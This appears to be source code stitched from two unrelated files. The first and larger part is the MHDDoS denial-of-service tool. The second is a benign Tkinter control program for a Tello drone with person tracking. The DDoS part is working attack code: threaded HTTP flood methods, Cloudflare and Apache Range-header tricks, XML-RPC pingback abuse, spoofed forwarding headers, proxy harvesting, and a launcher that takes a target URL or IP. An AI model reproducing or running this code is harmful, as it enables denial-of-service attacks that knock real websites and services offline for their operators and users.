'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(60)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), Session() as s:
with s.post(self._target.human_repr()) as ss:
ss.raise_for_status()
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
app.py
|
import cv2
import datetime
import numpy as np
import os
import threading
import time
import torch
from djitellopy import tello
from moviepy.editor import *
from tkinter import *
from PIL import Image, ImageTk # You have to import this last or else Image.open throws an error
from commands import start_flying, stop_flying
from model.train import get_transform
class GUI():
def __init__(self, HEIGHT, WIDTH):
self.HEIGHT = HEIGHT
self.WIDTH = WIDTH
self.root = Tk()
self.canvas = Canvas(self.root, height=self.HEIGHT, width=self.WIDTH)
# To connect to the drone and read in image feed
self.flydo = tello.Tello()
self.flydo.connect()
self.flydo.streamon()
# To toggle between takeoff and landing for button
self.flying = False
# For updating Flydo battery reading
self.bat_width = 200
self.bat_height = 50
self.flydo_battery = self.flydo.get_battery()
threading.Thread(target=lambda: self.current_battery()).start()
# For taking screenshots
self.screenshot_taken = False
# For recording videos
self.recording = False
# For tracking function
self.tracking = False
self.tracking_img = None
self.MODEL_PATH = "model/trained_detector.pth"
def takeoff_land(self):
'''Flydo takes off if not flying, lands if flying.'''
if self.flying:
# threading.Thread(target=lambda: dummy_tello_fn()).start()
threading.Thread(target=lambda: self.flydo.land()).start()
self.flying = False
else:
# threading.Thread(target=lambda: dummy_tello_fn()).start()
threading.Thread(target=lambda: self.flydo.takeoff()).start()
self.flying = True
def current_battery(self):
'''Gets Flydo's current battery level every 5 seconds.
Battery level displayed is altered if the battery decreases.'''
while True:
self.flydo_battery = self.flydo.get_battery()
time.sleep(5)
def take_screenshot(self):
        '''Takes whatever Flydo currently sees and saves the original image (before GUI resizing).'''
if not os.path.exists("screenshots"):
os.mkdir("screenshots")
pic_name = str(datetime.datetime.now())
pic_name = pic_name.replace(":", "-").replace(" ", "-").replace(".", "-")
threading.Thread(target=lambda: cv2.imwrite(f"screenshots/{pic_name}.png", self.current_img)).start()
self.screenshot_taken = True
def take_video(self):
'''Click record button once to start recording, click again to stop and save video.'''
if not os.path.exists("recordings"):
os.mkdir("recordings")
if not os.path.exists("unprocessed_recordings"):
os.mkdir("unprocessed_recordings")
if self.recording:
self.recording = False
            # Post-processing because the video Flydo saves plays back 5X slower for some reason.
clip = VideoFileClip(f"unprocessed_recordings/{self.vid_name}.avi")
final = clip.fx(vfx.speedx, 5)
threading.Thread(target=lambda: final.write_videofile(f"recordings/{self.vid_name}.mp4")).start() # Speed up video 5X, save as mp4
else:
# First remove old unprocessed videos to save space
for vid in os.listdir("unprocessed_recordings"):
os.remove(f"unprocessed_recordings/{vid}")
self.recording = True
threading.Thread(target=lambda: self.take_video_helper()).start()
def take_video_helper(self):
        '''This is just to make threading easier, because creating the video uses a while loop.'''
self.vid_name = str(datetime.datetime.now())
self.vid_name = self.vid_name.replace(":", "-").replace(" ", "-").replace(".", "-")
        videowriter = cv2.VideoWriter(f"unprocessed_recordings/{self.vid_name}.avi", cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (self.current_img.shape[1], self.current_img.shape[0]))
        while self.recording:
            frame = self.current_img
            videowriter.write(frame)
        videowriter.release()  # Finalize the .avi so the post-processing step can open it
def track_person(self):
'''Uses trained Faster R-CNN model to create bounding box,
positions center of Flydo's POV towards center of bbox.'''
if self.tracking:
self.tracking = False
print("Stopped tracking")
else:
self.tracking = True
threading.Thread(target=lambda: self.tracking_helper()).start()
print("Now tracking")
def tracking_helper(self):
'''Just a helper function for threading purposes.'''
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model = torch.load(self.MODEL_PATH)
model.eval() # Set to evaluation mode
transform = get_transform()
        while self.tracking:
            with torch.no_grad():
                img = Image.fromarray(cv2.cvtColor(self.current_img, cv2.COLOR_BGR2RGB))  # Convert cv2 img to PIL
                img = transform(img).to(device)
                img = img.unsqueeze(0)  # Add an extra first dimension, because the model predicts in batches
                prediction = model(img)
            image = self.current_img  # Start from the raw frame so "image" is always defined
            try:
                max_idx = np.argmax(prediction[0]["scores"].cpu().numpy())
                confidence = prediction[0]["scores"][max_idx].cpu().numpy()
                bbox_coords = prediction[0]["boxes"].cpu().numpy()[max_idx]
                bbox_coords = [int(x) for x in bbox_coords]
                image = cv2.rectangle(image, (bbox_coords[0], bbox_coords[1]), (bbox_coords[2], bbox_coords[3]), (0, 0, 255), 2)
                image = cv2.putText(image, f"{int(confidence*100)}%", (bbox_coords[0], bbox_coords[1]), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)
            except ValueError:  # If there are no boxes detected
                pass
            image = cv2.putText(image, "Now Tracking", (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)
            self.tracking_img = image  # This will be the new overlay
